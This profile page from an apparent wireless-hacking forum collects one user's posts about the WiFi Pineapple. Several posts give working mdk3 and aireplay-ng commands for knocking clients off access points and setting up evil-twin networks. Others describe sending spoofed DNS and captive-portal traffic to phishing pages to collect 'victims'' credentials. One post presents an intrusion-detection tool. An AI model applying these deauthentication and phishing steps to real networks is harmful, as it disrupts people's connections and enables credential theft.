NullNull
-
Posts
210 -
Joined
-
Last visited
-
Days Won
6
Posts posted by NullNull
-
-
Very Good! Thanks mram42!
-
dnsspoof infusion creates that file. Also creates /www//library/test/success.html for iOS 6 or oldest versions for the same reason. The infusion has an option not to create those files
-
Try searching "tango mode" in the forums ;)
-
Ok, so I see that hak5 offers paid support and infusion creation. I would be willing to actually pay for api documentation, for the good of the pineapple community. Please pm me and let me know a price.
And where did you actually saw that?
-
witch radio do you use?
-
Thanks for all the support guys..... Just one last question... PROIMISE :)
Earlier in this thread kiatoGS kindly put down some mdk3 commands, can you just explain what the commands are doing?
echo {root_ap_bssid} > black.list
mdk3 {monitor_int} d -c {root_ap_channel} -b black.list
Thanks
echo {root_ap_bssid} > black.list = create a file called black.list with the AP bssid
mdk3 {monitor_int} d -c {root_ap_channel} -b black.list = Run mdk3 on your monitor interface (mon0) in deauthentication mode (d) on AP channel ( -c 6 ) with the blacklist file you created above (-b)
TYTecholust this is correct! I just want to add some details... At the black.list you can add as many APs as you like. The format of the file should be this:
root@kiatogs:~# cat black.list CC:1A:FA:9F:3D:14 C1:F4:56:7A:23:35 38:22:FF:A2:65:F1 root@kiatogs:~#
If the APs you want to deauth (and their bssids are in the black.list) are on different channels you can use:
mdk3 mon0 d -c 1,6,11,13 -b black.list
This command will use interface mon0 and the mdk3 will search for the bssids that are in the black.list at the channels 1, 6, 11 and 13.
If -c parameter is not declared mdk3 will hop in all channels to find those bssids.
You can find out more by typing:
mdk3 --fullhelp
or:
man mdk3
-
From https://www.wifipineapple.com
Dual unlocked high gain radios emphasize the strengths of two chips infamous for their hacking potential; the AR9331 and the RTL8187. SMA connectors for professional antennas
From www.google.com:
https://www.google.gr/search?q=which+wifi+antenna+to+choose&oq=witch+wifi+antena&aqs=chrome.2.69i57j0l5.35140j0j7&sourceid=chrome&es_sm=121&ie=UTF-8
-
As far as I am aware, this is incredibly difficult if not impossible to do.
Maybe you are mistaking it with something else
Step 1
Configure your AP to have exactly the same SSID ENCRYPTION and PASSKEY as the root AP BUT different channel. The channel of your AP should be at least 3 channels away from the root AP. (e.g if the root AP channel is 11 your's should be maximum 7, i would had set it as 1).
Step 2
To deauth clients from the root AP you will need a second wireless card (e.g wlan1) and use aireplay-ng or mdk3 deauth mode. I suggest mdk3. If you do not run any deauth attack use the same channel as the root AP. In this case new clients will connect to AP with better/stronger signal quality/strength and the already connected clients will stay connected to root AP.
Run this to install mdk3
opkg update opkg install mdk3
and this to see mdk3 options
mdk3 --fullhelp
to run the deauth attack with mdk3 run:
ifconfig wlan1 down airmon-ng start wlan1 echo {root_ap_bssid} > black.list mdk3 {monitor_int} d -c {root_ap_channel} -b black.list(replace {root_ap_bssid}, {monitor_int} and {root_ap channel})
If you still want to use aireplay-ng and deauth every client from the root AP run:
ifconfig wlan1 down iwconfig wlan1 channel {root_ap_channel} airmon-ng start wlan1 aireplay-ng -0 100 -a {root_ap_bssid} {monitor_int}(replace {root_ap_channel}, {root_ap_bssid} and {monitor_int})
Else if you want to deaut only one client run:
ifconfig wlan1 down iwconfig wlan1 channel {root_ap_channel} airmon-ng start wlan1 aireplay-ng -0 100 -a {root_ap_bssid} -c {client_bssid} {monitor_int}(replace {root_ap_channel}, {root_ap_bssid}, {client_bssid} and {monitor_int})
-
https://forums.hak5.org/index.php?/topic/31915-nodogsplash-redirecturl-command/?fromsearch=1
Like this but instead of a web URL it can be directed to a page that has links to our favorite spoofed pages hosted on the pineapple in the form of file paths?
No. This url is used to redirect the client to the "real internet" when has successfully loged in to the captive portal. You need to setup your phishing page at /etc/nodogsplash/splash.html
1) Do a google search on how captive portals and nodogsplash work
2) Use newbi3 infusion called Evil Portal.
FIY: I guess you are using php for logging credentials. nodogsplash does not support php. again newbi3 channel on youtube an some of his topics here will help you "overcome" it.
-
Hello everyone,
so i am playing with my pineapple the last few days trying to make a captive portal. I noticed that nodogsplash only redirects traffic when the pineapple has internet connection. Also because of that, the psedo-browser iOS 6 and 7 (and now android 4.4) are using to detect captive portals is not poping up. Actually this is what i want... to make this pop-up browser to appear every time one of those O.S are connecting but with out having my pineapple connected to the internet...
It has something to do with the way nodogsplash sets up iptables ( i think )..
If everyone has something to suggest i would appreciate it :)
-
There's a massive overhaul in the works that will have you rethinking Karma completely. It isn't simply a matter of making it "support more devices". That's about as much as I should go into.
Will it be hardware related or only software?
-
Description
Wireless IDS is an open source tool written in Python and work on Linux environment. This tool may be useful to those penetration testers, trainers and for those who interest and want to know more about wireless hacking..WIDs will sniff your surrounding air traffic for suspicious activities such as WEP/WPA/WPS attacking packets. It do the following- Detect mass deauthentication sent to client / access point which unreasonable amount indicate possible WPA attack for handshakes.
- Continual sending data to access point using broadcast MAC address which indicate a possibility of WEP attacks
- Unreasonable amount of communication between wireless client and access point using EAP authentication which indicate the possibility of WPS bruteforce attack by Reaver / WPSCrack
- Detection of changes in connection to anther access point which may have the possibility of connection to Rogue AP (User needs to assess the situation whether similar AP name)
Newly Added Features !!!
- Display similar Access Point's name (SSID) which could have the possibility of WiFi 'Evil Twins'.
- Display of probing SSID by wireless devices
- Detection of Korek Chopchop packets sent by Aircrack-NG (WEP attacks)
- Detection of Fragmentation PRGA packets sent by Aircrack-NG (WEP attacks)
- Detection of possible WPA Downgrade attack by MDK3
- Detection of possible Michael Shutdown exploitation (TKIP) by MDK3
- Detection of Beacon flooding by MDK3
- Detection of possible Authentication DoS by MDK3
- Detection of possible association flooding
- Detection of WPA Migration Attack by Aircrack-NG (WPA Attack)
- Allow logging of events to file.
- Allow disabling of displaying of probing devices
- Wireless devices / Access point's manufacturer Identification basing on the MAC OUI database.
Pictures
Links
-
The DNS querys are still done unencrypted with HTTPS so i think DNSspoof should still work. the problem i think you would have is the browser moaning about the cert not matching etc.
The app will get a successful connection and nothing will change. Just tested!!
-
That is DNSspoofing with a redirect to a phishing page... But the problem with spoofing all traffic to the pineapple (172.16.42.1 *) is that a lot of those apps use https. Wouldn't those still get through?
Yes, you are correct! Many apps (eg Facebook app) are using https. I never use this method with my pineapple connected to the internet and none of the traffic pases through those apps so i forgot this detail.
-
I am asking if there is a way I can de-authenticate android apps so when it is reopened it will either ask for their info to log in or will authenticate like the app was freshly started.
I guess its down to either come kind of cookie or session type thing or maybe some PHP voodoo.
Neither of this will work. This apps are encrypting their data wich makes Man In The Middle Attacks pointless.
Maybe look into DNS spoof and running your own phishing pages?
In my expirience this seems the only way. Spoofing all traffic (172.16.42.1 *) will not let the app connect to it's servers wich will lead the app to show a "No Internet Connection"(even if the pineapple IS connected). After that 80% of the victims will try to use their browsers to check the internet connection and there is where your phishing page will appear.
F.Y.I
Apple devices check for internet connection every time they connect to a network. If there is a captive portal in this network (or you are spoofing all traffic to your phishing page) a pseydo-browser will pop-up and wont let the user do anything else (including using any of this apps) until it gets through the captive portal (or your phishing page by entering their credentials).
-
Try to disable wireless from UI and then run
airmon-ng start wlan1 airodump-ng mon0
-
Maybe it would help to try the --ivs option in airodump-ng? This would only capture the required packets for cracking.
This will only work when cracking WEP, for WPA all packets need to be captured in order to have a successfull 4-way-handshake.
-
if you type 173.252.110.27 at your url bar and dnsspoof is running with 172.16.42.1 *facebook.com will redirect the traffic?? :/
-
You can Lookup facebook ip and redirect the "client" to that ip.
But i do not think dnsspoof will redirect https trafic even with the sslstrip at the first place!
-
Are you on 1.0.4?
-
You want to change the mac of another access point? :/
-
I dont think that it has to be part of the firmware because people that are using a captive protal DO want that pseudo-browser to pop-up.
I posted it here because dnsspoof infusion already has an option of installing " Fake captive portal files " (for iOS and Windows)
-
Until iOS 6 Apple's devices were just looking at .../library/test/success.html to check internet connection. Creating the same html file at /www/library/test/ it was easy to fool the device that it have internet connection BUT since iOS 7 is out this will not do the trick. iDevices are now cheking for internet connection using a list that contains over 200 servers. Here is a link with the solution for devices using lighttpd.
http://forum.daviddarts.com/read.php?9,8879,8910#msg-8910
Pineapple is using uhttpd. Mayde whistlemaster can do some of his magic ;).
-
i was playing with my pineapple (fw 3.0) after a long time and i was having some problems with the autostart feature. After some digging it turns out there is a wrong filepath at /pineapple/components/infusions/dnsspoof/includes/autostart.sh
Original:
dnsspoof -i br-lan -f /pineapple/config/spoofhost > /dev/null 2> ${MYPATH}log/output_${MYTIME}.log &Correct:
dnsspoof -i br-lan -f /etc/pineapple/spoofhost > /dev/null 2 > ${MYPATH}log/output_${MYTIME}.log &It's very wierd that no one noticed after such a long time!
Is 1.1 the latest version? :/
[Web UI] Custom WiFi Pineapple interface with some more features
in WiFi Pineapple Mark V
Posted
Careful with that...